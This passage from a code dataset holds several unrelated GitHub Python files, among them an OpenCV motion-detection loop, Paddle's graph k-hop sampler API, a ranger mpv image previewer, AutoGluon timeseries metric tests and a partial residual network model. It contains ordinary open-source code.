glyph, font=font, fill=1)\n\n    lines_len = [len(line) for line in GLYPHS]\n    img_width = GLYPH_H_SPACING + max(lines_len) * (GLYPH_WIDTH +\n                                                    GLYPH_H_SPACING)\n    img_height = GLYPH_V_SPACING + len(GLYPHS) * (GLYPH_HEIGHT +\n                                                  GLYPH_V_SPACING)\n    return img.crop((0, 0, img_width, img_height))\n\n\nif __name__ == '__main__':\n    img = render_font(sys.argv[1])\n\n    print(get_glyph_pixels(img)['A'])\n    img.save('font.png')\n","repo_name":"Stalis/esp-test-project","sub_path":"fonts/font_parser.py","file_name":"font_parser.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15809483026","text":"import cv2\nimport numpy as np\nimport os\nfrom time import time\nfrom detector import MotionDetector\nfrom packer import pack_images\nfrom numba import jit\n\n@jit(nopython=True)\ndef filter_fun(b):\n    return ((b[2] - b[0]) * (b[3] - b[1])) > 300\n\nif __name__ == \"__main__\":\n\n\t\n\tdetector = MotionDetector(bg_history=1,\n                              bg_skip_frames=1,\n                              movement_frames_history=2,\n                              brightness_discard_level=30,\n                              bg_subs_scale_percent=0.2,\n                              pixel_compression_ratio=0.2,\n                              group_boxes=False,\n                              expansion_step=1)\n\n\tb_height = 320\n\tb_width = 320\n\t\n\tres = []\n\tavg_fps = []\n\tfc = dict()\n\tctr = 0\n\tpath = \"/home/darrylsf/Desktop/Motion_API/frames_college/\"\n\tdir_list = 
os.listdir(path)\n\tdir_list.sort()\n\t#print(dir_list)\n\t#print(path+dir_list[0])\n\tpath2 = path+dir_list[0]\n\t#frame = cv2.imread(path2)\n\t#cv2.imshow('Frame' , frame)\n\t\n\tfor i in dir_list:\n\t\tframe = cv2.imread('/home/darrylsf/Desktop/Motion_API/frames_college/'+i)\n\t\tframe2 = cv2.imread('/home/darrylsf/Desktop/Motion_API/frames_college/ezgif-frame-005.jpg')\n\t\t#cv2.imshow(\"5 FRAME\" , frame2)\n\t\tprint('/home/darrylsf/Desktop/Motion_API/frames_college/'+i)\n\t\tbegin = time()\n\n\t\tboxes, frame = detector.detect(frame)\n # boxes hold all boxes around motion parts\n\n ## this code cuts motion areas from initial image and\n ## fills \"bins\" of 320x320 with such motion areas.\n ##\n\t\tresults = []\n \n\t\tif boxes:\n\t\t\tresults, box_map = pack_images(frame=frame, boxes=boxes, width=b_width, height=b_height,\n box_filter=filter_fun)\n\t\t\ttext = \"Yes\"\n # box_map holds list of mapping between image placement in packed bins and original boxes\n\n ## end\n\t\tf = open(\"frame_counter.txt\", \"a\")\n\t\tfor b in boxes:\n\t\t\tcv2.rectangle(frame, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)\n\t\tif(len(boxes) > 0):\n\t\t\ttext = \"Yes\"\n\t\t\tf.write(\"1\\n\") \n\n\t\telse:\n\t\t\ttext = \"No\"\n\t\t\tf.write(\"0\\n\") \n\n\t\tf.close()\n\t\tend = time()\n \n\t\tit = (end - begin) * 1000\n\t\tit2 = (end - begin)\n\t\tfps = (1 / it2)\n\t\tprint(\"FPS: \"+str(fps))\n\t\tavg_fps.append(fps)\n\t\tif(len(avg_fps) == 0):\n\t\t\tcontinue\n\t\telse:\n\t\t\tavg = sum(avg_fps) / len(avg_fps)\n\t\tres.append(it)\n\t\tprint(\"StdDev: %.4f\" % np.std(res), \"Mean: %.4f\" % np.mean(res), \"Last: %.4f\" % it,\n \"Boxes found: \", len(boxes))\n\n\t\tcv2.putText(frame, \"Motion Detected: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\t\tcv2.putText(frame, \"Average FPS: {}\".format(avg), (10, 80),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\t\tif len(res) > 10000:\n\t\t\tres = []\n\n # idx = 0\n # for r in results:\n # idx += 1\n # cv2.imshow('packed_frame_%d' % idx, r)\n\n\t\tctr += 1\n\t\tnc = len(results)\n\t\tif nc in fc:\n\t\t\tfc[nc] += 1\n\t\telse:\n\t\t\tfc[nc] = 0\n\n\t\tif ctr % 100 == 0:\n\t\t\tprint(\"Total Frames: \", ctr, \"Packed Frames:\", fc)\n\n\t\tcv2.imshow('last_frame', frame)\n\t\tcv2.imshow('detect_frame', detector.detection_boxed)\n\t\tcv2.imshow('diff_frame', detector.color_movement)\n\t\tcv2.imwrite('/home/darrylsf/Desktop/Motion_API/result_frames/'+i , frame)\n\t\n\tcv2.waitKey(0) \n \n\t#closing all open windows \n\tcv2.destroyAllWindows() ","repo_name":"droid2299/motion-detection","sub_path":"motion_detector/image_motion.py","file_name":"image_motion.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71506714638","text":"#!/usr/bin/python\nimport os\nimport glob\nimport empyer\nimport argparse\n\n\n\n# This program is designed to take a diffraction signal, convert the signal to polar coordinates and then output\n# the angular correlation and power spectrum.\n\n\"\"\"\nOPTIONS:\n-d = cwd :directory\n\"\"\"\n\n\ndef correlation(signal_file):\n ds = empyer.load(signal_file, signal_type='diffraction_signal')\n ds.mask_below(300)\n file_name = os.path.splitext(signal_file)[0]\n ps = ds.calculate_polar_spectrum()\n ps.save(filename=file_name+'_polar.hdf5', overwrite=True)\n acs = ps.autocorrelation()\n acs.save(filename=file_name + '_angular.hdf5', overwrite=True)\n pow_s = acs.get_power_spectrum()\n 
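# --- editor's sketch, not part of the dataset records (helper name is hypothetical) ---
# The surrounding correlation() saves each processing stage as
# "<stem>_<suffix>.hdf5"; a small helper would keep that naming convention in
# one place if more stages are added:
#
#     def save_stage(signal, stem, suffix):
#         signal.save(filename='{}_{}.hdf5'.format(stem, suffix), overwrite=True)
#
#     # save_stage(ps, file_name, 'polar')
#     # save_stage(acs, file_name, 'angular')
#     # save_stage(pow_s, file_name, 'angularPower')
# --- end sketch ---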
pow_s.save(filename=file_name+'_angularPower.hdf5', overwrite=True)\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\",\n \"--directory\",\n type=str,\n help=\"input directory\")\n args = parser.parse_args()\n\n if not args.directory:\n args.directory = os.getcwd()\n if os.path.isdir(args.directory):\n files = glob.glob(args.directory+\"/*.hdf5\")\n else:\n files = [args.directory]\n print(files)\n\n for f in files:\n correlation(f)\n","repo_name":"CSSFrancis/empyer","sub_path":"CusterOperations/cluster_scripting.py","file_name":"cluster_scripting.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"36020534401","text":"from paddle import _legacy_C_ops\nfrom paddle.base.data_feeder import check_variable_and_dtype\nfrom paddle.base.layer_helper import LayerHelper\nfrom paddle.framework import in_dynamic_mode\n\n\ndef graph_khop_sampler(\n row,\n colptr,\n input_nodes,\n sample_sizes,\n sorted_eids=None,\n return_eids=False,\n name=None,\n):\n \"\"\"\n\n Graph Khop Sampler API.\n\n This API is mainly used in Graph Learning domain, and the main purpose is to\n provide high performance graph khop sampling method with subgraph reindex step.\n For example, we get the CSC(Compressed Sparse Column) format of the input graph\n edges as `row` and `colptr`, so as to covert graph data into a suitable format\n for sampling. And the `input_nodes` means the nodes we need to sample neighbors,\n and `sample_sizes` means the number of neighbors and number of layers we want\n to sample.\n\n Args:\n row (Tensor): One of the components of the CSC format of the input graph, and\n the shape should be [num_edges, 1] or [num_edges]. The available\n data type is int32, int64.\n colptr (Tensor): One of the components of the CSC format of the input graph,\n and the shape should be [num_nodes + 1, 1] or [num_nodes].\n The data type should be the same with `row`.\n input_nodes (Tensor): The input nodes we need to sample neighbors for, and the\n data type should be the same with `row`.\n sample_sizes (list|tuple): The number of neighbors and number of layers we want\n to sample. The data type should be int, and the shape\n should only have one dimension.\n sorted_eids (Tensor, optional): The sorted edge ids, should not be None when `return_eids`\n is True. The shape should be [num_edges, 1], and the data\n type should be the same with `row`. Default is None.\n return_eids (bool, optional): Whether to return the id of the sample edges. Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n - edge_src (Tensor), The src index of the output edges, also means the first column of\n the edges. The shape is [num_sample_edges, 1] currently.\n - edge_dst (Tensor), The dst index of the output edges, also means the second column\n of the edges. The shape is [num_sample_edges, 1] currently.\n - sample_index (Tensor), The original id of the input nodes and sampled neighbor nodes.\n - reindex_nodes (Tensor), The reindex id of the input nodes.\n - edge_eids (Tensor), Return the id of the sample edges if `return_eids` is True.\n\n Examples:\n .. 
code-block:: python\n\n >>> import paddle\n\n >>> row = [3, 7, 0, 9, 1, 4, 2, 9, 3, 9, 1, 9, 7]\n >>> colptr = [0, 2, 4, 5, 6, 7, 9, 11, 11, 13, 13]\n >>> nodes = [0, 8, 1, 2]\n >>> sample_sizes = [2, 2]\n >>> row = paddle.to_tensor(row, dtype=\"int64\")\n >>> colptr = paddle.to_tensor(colptr, dtype=\"int64\")\n >>> nodes = paddle.to_tensor(nodes, dtype=\"int64\")\n\n >>> edge_src, edge_dst, sample_index, reindex_nodes = paddle.incubate.graph_khop_sampler(row, colptr, nodes, sample_sizes, False)\n\n \"\"\"\n\n if in_dynamic_mode():\n if return_eids:\n if sorted_eids is None:\n raise ValueError(\n \"`sorted_eid` should not be None \" \"if return_eids is True.\"\n )\n (\n edge_src,\n edge_dst,\n sample_index,\n reindex_nodes,\n edge_eids,\n ) = _legacy_C_ops.graph_khop_sampler(\n row,\n sorted_eids,\n colptr,\n input_nodes,\n \"sample_sizes\",\n sample_sizes,\n \"return_eids\",\n True,\n )\n return edge_src, edge_dst, sample_index, reindex_nodes, edge_eids\n else:\n (\n edge_src,\n edge_dst,\n sample_index,\n reindex_nodes,\n _,\n ) = _legacy_C_ops.graph_khop_sampler(\n row,\n None,\n colptr,\n input_nodes,\n \"sample_sizes\",\n sample_sizes,\n \"return_eids\",\n False,\n )\n return edge_src, edge_dst, sample_index, reindex_nodes\n\n check_variable_and_dtype(\n row, \"Row\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n if return_eids:\n if sorted_eids is None:\n raise ValueError(\n \"`sorted_eid` should not be None \" \"if return_eids is True.\"\n )\n check_variable_and_dtype(\n sorted_eids, \"Eids\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n check_variable_and_dtype(\n colptr, \"Col_Ptr\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n check_variable_and_dtype(\n input_nodes, \"X\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n helper = LayerHelper(\"graph_khop_sampler\", **locals())\n edge_src = helper.create_variable_for_type_inference(dtype=row.dtype)\n edge_dst = helper.create_variable_for_type_inference(dtype=row.dtype)\n sample_index = helper.create_variable_for_type_inference(dtype=row.dtype)\n reindex_nodes = helper.create_variable_for_type_inference(dtype=row.dtype)\n edge_eids = helper.create_variable_for_type_inference(dtype=row.dtype)\n helper.append_op(\n type=\"graph_khop_sampler\",\n inputs={\n \"Row\": row,\n \"Eids\": sorted_eids,\n \"Col_Ptr\": colptr,\n \"X\": input_nodes,\n },\n outputs={\n \"Out_Src\": edge_src,\n \"Out_Dst\": edge_dst,\n \"Sample_Index\": sample_index,\n \"Reindex_X\": reindex_nodes,\n \"Out_Eids\": edge_eids,\n },\n attrs={\"sample_sizes\": sample_sizes, \"return_eids\": return_eids},\n )\n if return_eids:\n return edge_src, edge_dst, sample_index, reindex_nodes, edge_eids\n else:\n return edge_src, edge_dst, sample_index, reindex_nodes\n","repo_name":"PaddlePaddle/Paddle","sub_path":"python/paddle/incubate/operators/graph_khop_sampler.py","file_name":"graph_khop_sampler.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"33240793318","text":"import os\nimport subprocess\nimport json\nimport atexit\nimport socket\nfrom pathlib import Path\n\nimport logging\nlogger = logging.getLogger(__name__)\nimport traceback\n\nfrom ranger.ext.img_display import ImageDisplayer, register_image_displayer\n\n@register_image_displayer(\"mpv\")\nclass MPVImageDisplayer(ImageDisplayer):\n \"\"\"Implementation of ImageDisplayer using mpv, a general media viewer.\n Opens media in a separate X window.\n\n mpv 0.25+ needs to be 
installed for this to work.\n    """\n\n    def _send_command(self, path, sock):\n\n        message = '{"command": ["raw","loadfile",%s]}\\n' % json.dumps(path)\n        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n        s.connect(str(sock))\n        logger.info('-> ' + message)\n        s.send(message.encode())\n        message = s.recv(1024).decode()\n        logger.info('<- ' + message)\n\n    def _launch_mpv(self, path, sock):\n\n        proc = subprocess.Popen([\n            * os.environ.get("MPV", "mpv").split(),\n            "--no-terminal",\n            "--force-window",\n            "--input-ipc-server=" + str(sock),\n            "--image-display-duration=inf",\n            "--loop-file=inf",\n            "--no-osc",\n            "--no-input-default-bindings",\n            "--keep-open",\n            "--idle",\n            "--",\n            path,\n        ])\n\n        @atexit.register\n        def cleanup():\n            proc.terminate()\n            sock.unlink()\n\n    def draw(self, path, start_x, start_y, width, height):\n\n        path = os.path.abspath(path)\n        cache = Path(os.environ.get("XDG_CACHE_HOME", "~/.cache")).expanduser()\n        cache = cache / "ranger"\n        cache.mkdir(exist_ok=True)\n        sock = cache / "mpv.sock"\n\n        try:\n            self._send_command(path, sock)\n        except (ConnectionRefusedError, FileNotFoundError):\n            logger.info('LAUNCHING ' + path)\n            self._launch_mpv(path, sock)\n        except Exception as e:\n            logger.exception(traceback.format_exc())\n            raise\n        logger.info('SUCCESS')\n","repo_name":"shiryel/fennecOS","sub_path":"modules/desktop-environment/common/ranger/config/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"70896055117","text":"from PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtGui import QFont, QColor, QPainter, QPen\nfrom PyQt5.QtCore import Qt\n\nfrom ..colors import get_color\n\n\nclass Label(QLabel):\n\n    def __init__(self, parent, text=None, is_bold=False):\n        super().__init__(parent)\n\n        font = QFont("Segoe UI", 11)\n        font.setBold(is_bold)\n\n        self.setAutoFillBackground(True)\n\n        self.refresh()\n\n        self.setText(text)\n        self.setFont(font)\n\n    def refresh(self):\n        pass\n\n    def paintEvent(self, event):\n        painter = QPainter(self)\n\n        painter.setRenderHint(QPainter.HighQualityAntialiasing)\n        painter.setPen(QPen(QColor(get_color("text"))))\n\n        painter.drawText(0, 0, self.width(), self.height(),\n                         Qt.AlignLeft, self.text())\n","repo_name":"TurtleP/BreadTools","sub_path":"BreadTools/gui/elements/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27655134832","text":"import csv\n\ndef tsv_to_csv(input_file, output_file, encoding):\n    with open(input_file, 'r', encoding=encoding) as tsvfile:\n        reader = csv.reader(tsvfile, delimiter='\\t')\n        with open(output_file, 'w', newline='', encoding=encoding) as csvfile:\n            writer = csv.writer(csvfile)\n            for row in reader:\n                writer.writerow(row)\n\ninput_file = 'titles.csv'\noutput_file = 'output.csv'\ntsv_to_csv(input_file, output_file, 'utf-8')\n","repo_name":"strovertz/mysql-dashboard-terraform-grafana","sub_path":"automations/tsv_to_csv.py","file_name":"tsv_to_csv.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9102156414","text":"\n# This script was written by Trevor Hubbard; its purpose is to quickly calculate \n# the distance between some points in a network embedding\n\n# =========================\n# * SETUP *\n# 
=========================\n\nimport matplotlib.pyplot as plt\n\n# =========================\n# * CLASSES *\n# =========================\n\n\n# =========================\n# * METHODS *\n# =========================\n\n\n# =========================\n# * MAIN * \n# =========================\n\n# This creates the class from the node embeddings\nballPoints = []\nboomerangPoints = []\nembeddingPath = \"C:\\Data\\College\\CS 682 - Neural Networks\\Project\\Task 3 - Network Development\\Data\\industryGraph - 2 dim embedding.emd\"\nwith open(embeddingPath, \"r\", encoding=\"utf-8\") as embeddingFile:\n\n\tfor embeddingNum, embedding in enumerate(embeddingFile):\n\t\tif (embeddingNum == 0): continue #Skip the first line\n\t\tnodeID, xVal, yVal = [float(x) for x in embedding.split()]\n\t\tnodeID = int(nodeID)\n\t\tif (xVal < -2 and yVal < -1): \n\t\t\tballPoints.append((xVal, yVal))\n\t\telse:\n\t\t\tboomerangPoints.append((xVal, yVal))\n\nballPointsX = [x[0] for x in ballPoints]\nballPointsY = [x[1] for x in ballPoints]\nboomerangPointsX = [x[0] for x in boomerangPoints]\nboomerangPointsY = [x[1] for x in boomerangPoints]\nfig = plt.figure()\nax = fig.add_axes([0, 0, 1, 1])\nax.set_title(\"2-Dimensional Network Embedding of Music Industry Social Network\")\nax.scatter(ballPointsX, ballPointsY, color=\"green\")\nax.scatter(boomerangPointsX, boomerangPointsY, color=\"purple\")\nplt.show()","repo_name":"trevbook/Hit-Song-Predictor","sub_path":"Task 3 - Network Development/Scripts/visualization_node2vec2d.py","file_name":"visualization_node2vec2d.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6384769524","text":"from typing import List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom gluonts.dataset.split import split\nfrom gluonts.ev.metrics import (\n MAE,\n MAPE,\n MASE,\n MSE,\n ND,\n RMSE,\n SMAPE,\n AverageMeanScaledQuantileLoss,\n MeanWeightedSumQuantileLoss,\n)\nfrom gluonts.ev.metrics import Metric as GluonTSMetric\nfrom gluonts.model.evaluation import evaluate_forecasts\nfrom gluonts.model.forecast import QuantileForecast\n\nfrom autogluon.timeseries import TimeSeriesPredictor\nfrom autogluon.timeseries.metrics import AVAILABLE_METRICS, DEFAULT_METRIC_NAME, check_get_evaluation_metric\nfrom autogluon.timeseries.metrics.utils import _in_sample_abs_seasonal_error, _in_sample_squared_seasonal_error\nfrom autogluon.timeseries.models.gluonts.abstract_gluonts import AbstractGluonTSModel\n\nfrom .common import DUMMY_TS_DATAFRAME, get_data_frame_with_item_index\n\npytestmark = pytest.mark.filterwarnings(\"ignore\")\n\n\ndef get_ag_and_gts_metrics() -> List[Tuple[str, str, GluonTSMetric]]:\n # Each entry is a tuple (ag_metric_name, gts_metric_name, gts_metric_object)\n default_quantile_levels = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n # Metric that have different names in AutoGluon and GluonTS\n ag_and_gts_metrics = [\n (\"WQL\", \"mean_weighted_sum_quantile_loss\", MeanWeightedSumQuantileLoss(default_quantile_levels)),\n (\"SQL\", \"average_mean_scaled_quantile_loss\", AverageMeanScaledQuantileLoss(default_quantile_levels)),\n (\"WAPE\", \"ND[mean]\", ND(\"mean\")),\n ]\n # Metric that have same names in AutoGluon and GluonTS\n for point_metric_cls in [MAPE, SMAPE, MSE, RMSE, MASE, MAE]:\n name = str(point_metric_cls.__name__)\n ag_and_gts_metrics.append((name, f\"{name}[mean]\", point_metric_cls(\"mean\")))\n return ag_and_gts_metrics\n\n\nAG_AND_GTS_METRICS = 
get_ag_and_gts_metrics()\n\n\n@pytest.fixture(scope=\"module\")\ndef deepar_trained() -> AbstractGluonTSModel:\n pred = TimeSeriesPredictor(prediction_length=2, verbosity=4)\n pred.fit(\n DUMMY_TS_DATAFRAME,\n tuning_data=DUMMY_TS_DATAFRAME,\n hyperparameters={\n \"DeepAR\": dict(epochs=2),\n },\n )\n return pred._trainer.load_model(\"DeepAR\")\n\n\n@pytest.fixture(scope=\"module\")\ndef deepar_trained_zero_data() -> AbstractGluonTSModel:\n pred = TimeSeriesPredictor(prediction_length=2, verbosity=4)\n\n data = DUMMY_TS_DATAFRAME.copy() * 0\n\n pred.fit(\n data,\n tuning_data=data,\n hyperparameters={\n \"DeepAR\": dict(epochs=2),\n },\n )\n return pred._trainer.load_model(\"DeepAR\")\n\n\ndef to_gluonts_forecast(forecast_df, freq):\n forecast_list = []\n for item_id, fcast in forecast_df.groupby(level=\"item_id\", sort=False):\n start_date = fcast.index[0][1].to_period(freq=freq)\n qf = QuantileForecast(\n forecast_arrays=fcast.values.T,\n start_date=start_date,\n forecast_keys=fcast.columns,\n item_id=item_id,\n )\n forecast_list.append(qf)\n return forecast_list\n\n\ndef to_gluonts_test_set(data, prediction_length):\n ts_list = []\n for item_id, ts in data.groupby(level=\"item_id\", sort=False):\n entry = {\"target\": ts.loc[item_id][\"target\"], \"start\": pd.Period(ts.loc[item_id].index[0], freq=data.freq)}\n ts_list.append(entry)\n _, test_template = split(dataset=ts_list, offset=-prediction_length)\n return test_template.generate_instances(prediction_length, windows=1)\n\n\ndef check_gluonts_parity(\n ag_metric_name, gts_metric_name, gts_metric, data, model, zero_forecast=False, equal_nan=False\n):\n data_train, data_test = data.train_test_split(model.prediction_length)\n forecast_df = model.predict(data_train)\n forecast_df[\"mean\"] = forecast_df[\"0.5\"]\n if zero_forecast:\n forecast_df = forecast_df * 0\n seasonal_period = 3\n ag_metric = check_get_evaluation_metric(ag_metric_name)\n\n ag_value = ag_metric.sign * ag_metric(\n data_test,\n forecast_df,\n prediction_length=model.prediction_length,\n seasonal_period=seasonal_period,\n )\n\n gts_forecast = to_gluonts_forecast(forecast_df, freq=data_train.freq)\n gts_test_set = to_gluonts_test_set(data_test, model.prediction_length)\n gts_value = evaluate_forecasts(\n gts_forecast, test_data=gts_test_set, seasonality=seasonal_period, metrics=[gts_metric]\n ).values.item()\n assert np.isclose(gts_value, ag_value, atol=1e-5, equal_nan=equal_nan)\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef test_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained\n):\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME,\n model=deepar_trained,\n )\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef test_given_all_zero_data_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained_zero_data\n):\n if ag_metric_name in [\"WQL\", \"WAPE\"]:\n pytest.skip(\n \"GluonTS produces incorrect values for these metrics on all-zero data https://github.com/awslabs/gluonts/issues/3034\"\n )\n\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME.copy() * 0,\n model=deepar_trained_zero_data,\n equal_nan=True,\n )\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef 
test_given_zero_forecasts_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained\n):\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME,\n model=deepar_trained,\n zero_forecast=True,\n )\n\n\ndef test_available_metrics_have_coefficients():\n for metric_cls in AVAILABLE_METRICS.values():\n metric = metric_cls()\n assert metric.sign in [-1, 1]\n\n\n@pytest.mark.parametrize(\n \"check_input, expected_output\",\n [(None, AVAILABLE_METRICS[DEFAULT_METRIC_NAME]())]\n + [(metric_name, metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()]\n + [(metric_cls, metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()]\n + [(metric_cls(), metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()],\n)\ndef test_given_correct_input_check_get_eval_metric_output_correct(check_input, expected_output):\n assert expected_output.name == check_get_evaluation_metric(check_input).name\n\n\ndef test_given_unavailable_input_and_raise_check_get_eval_metric_raises():\n with pytest.raises(ValueError):\n check_get_evaluation_metric(\"some_nonsense_eval_metric\")\n\n\n@pytest.mark.parametrize(\"eval_metric\", [\"MASE\", \"RMSSE\", \"SQL\"])\ndef test_given_historic_data_not_cached_when_scoring_then_exception_is_raised(eval_metric):\n prediction_length = 3\n evaluator = check_get_evaluation_metric(eval_metric)\n data_future = DUMMY_TS_DATAFRAME.slice_by_timestep(-prediction_length, None)\n predictions = data_future.rename({\"target\": \"mean\"}, axis=1)\n with pytest.raises(AssertionError, match=\"Call `save_past_metrics` before\"):\n evaluator.compute_metric(data_future=data_future, predictions=predictions)\n\n\ndef test_when_eval_metric_seasonal_period_is_longer_than_ts_then_abs_seasonal_error_is_set_to_1():\n seasonal_period = max(DUMMY_TS_DATAFRAME.num_timesteps_per_item())\n naive_error_per_item = _in_sample_abs_seasonal_error(\n y_past=DUMMY_TS_DATAFRAME[\"target\"], seasonal_period=seasonal_period\n )\n assert (naive_error_per_item == 1.0).all()\n\n\ndef test_when_eval_metric_seasonal_period_is_longer_than_ts_then_squared_seasonal_error_is_set_to_1():\n seasonal_period = max(DUMMY_TS_DATAFRAME.num_timesteps_per_item())\n naive_error_per_item = _in_sample_squared_seasonal_error(\n y_past=DUMMY_TS_DATAFRAME[\"target\"], seasonal_period=seasonal_period\n )\n assert (naive_error_per_item == 1.0).all()\n\n\n@pytest.mark.parametrize(\"prediction_length, seasonal_period, expected_result\", [(3, 1, 3), (6, 3, 2)])\ndef test_RMSSE(prediction_length, seasonal_period, expected_result):\n data = get_data_frame_with_item_index(\n [\"1\"],\n start_date=\"2022-01-01 00:00:00\",\n data_length=2 * prediction_length,\n columns=[\"target\"],\n data_generation=\"sequential\",\n )\n predictions = get_data_frame_with_item_index(\n [\"1\"],\n start_date=str(pd.Timestamp(\"2022-01-01 00:00:00\") + pd.to_timedelta(prediction_length, unit=\"H\")),\n data_length=prediction_length,\n columns=[\"mean\"],\n data_generation=\"sequential\",\n )\n metric = check_get_evaluation_metric(\"RMSSE\")\n ag_value = metric.sign * metric(\n data, predictions, prediction_length=prediction_length, seasonal_period=seasonal_period\n )\n assert ag_value == expected_result\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_given_metric_is_optimized_by_median_when_model_predicts_then_median_is_pasted_to_mean_forecast(metric_name):\n eval_metric = check_get_evaluation_metric(metric_name)\n 
pred = TimeSeriesPredictor(prediction_length=5, eval_metric=eval_metric)\n pred.fit(DUMMY_TS_DATAFRAME, hyperparameters={\"DeepAR\": {\"epochs\": 1, \"num_batches_per_epoch\": 1}})\n predictions = pred.predict(DUMMY_TS_DATAFRAME)\n if eval_metric.optimized_by_median:\n assert (predictions[\"mean\"] == predictions[\"0.5\"]).all()\n else:\n assert (predictions[\"mean\"] != predictions[\"0.5\"]).any()\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_when_perfect_predictions_passed_to_metric_then_score_equals_optimum(metric_name):\n prediction_length = 5\n eval_metric = check_get_evaluation_metric(metric_name)\n data = DUMMY_TS_DATAFRAME.copy()\n predictions = data.slice_by_timestep(-prediction_length, None).rename(columns={\"target\": \"mean\"})\n for q in [\"0.1\", \"0.4\", \"0.9\"]:\n predictions[q] = predictions[\"mean\"]\n score = eval_metric.score(data, predictions, prediction_length=prediction_length)\n assert score == eval_metric.optimum\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_when_better_predictions_passed_to_metric_then_score_improves(metric_name):\n prediction_length = 5\n eval_metric = check_get_evaluation_metric(metric_name)\n data = DUMMY_TS_DATAFRAME.copy()\n predictions = data.slice_by_timestep(-prediction_length, None).rename(columns={\"target\": \"mean\"})\n for q in [\"0.1\", \"0.4\", \"0.9\"]:\n predictions[q] = predictions[\"mean\"]\n good_score = eval_metric.score(data, predictions + 1, prediction_length=prediction_length)\n bad_score = eval_metric.score(data, predictions + 50, prediction_length=prediction_length)\n assert good_score > bad_score\n","repo_name":"autogluon/autogluon","sub_path":"timeseries/tests/unittests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"74651054479","text":"\"\"\"Small network model that uses residual learning\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nBATCH_NORMALIZATION_MOMENTUM = 0.997\n\n\ndef batch_norm(input, training):\n \"\"\"Adds batch normalization to graph.\n Args:\n input: previous op/tensor\n training: Indicator for usage while training\"\"\"\n # epsilon use default\n return tf.layers.batch_normalization(input, training=training,\n momentum=BATCH_NORMALIZATION_MOMENTUM, fused=True,\n center=True, scale=True,)\n\n\ndef residual_unit(input, filters_num, kernel_size, training, name):\n \"\"\"Builds one residual unit\n Args:\n input: previous op/tensor\n filters_num: Number of resulting filters / feature-maps\n kernel_size: size of convolution kernel\n training: Indicator for usage while training\n name: name for layer\"\"\"\n with tf.name_scope(name):\n shortcut = input\n first_layer_stride = 1\n # if number of filters is doubled the size of the image representation is halved, shortcut have to be projected\n if int(shortcut.get_shape()[-1]) != filters_num:\n transform_conv = tf.layers.conv2d(input, filters=filters_num, kernel_size=1, strides=2, padding='SAME')\n shortcut = batch_norm(transform_conv, training)\n first_layer_stride = 2\n\n conv_1 = tf.layers.conv2d(input, filters=filters_num, kernel_size=kernel_size, padding='SAME',\n strides=first_layer_stride, use_bias=False)\n bn_1 = batch_norm(conv_1, training)\n relu_1 = tf.nn.relu(bn_1)\n\n conv_2 = 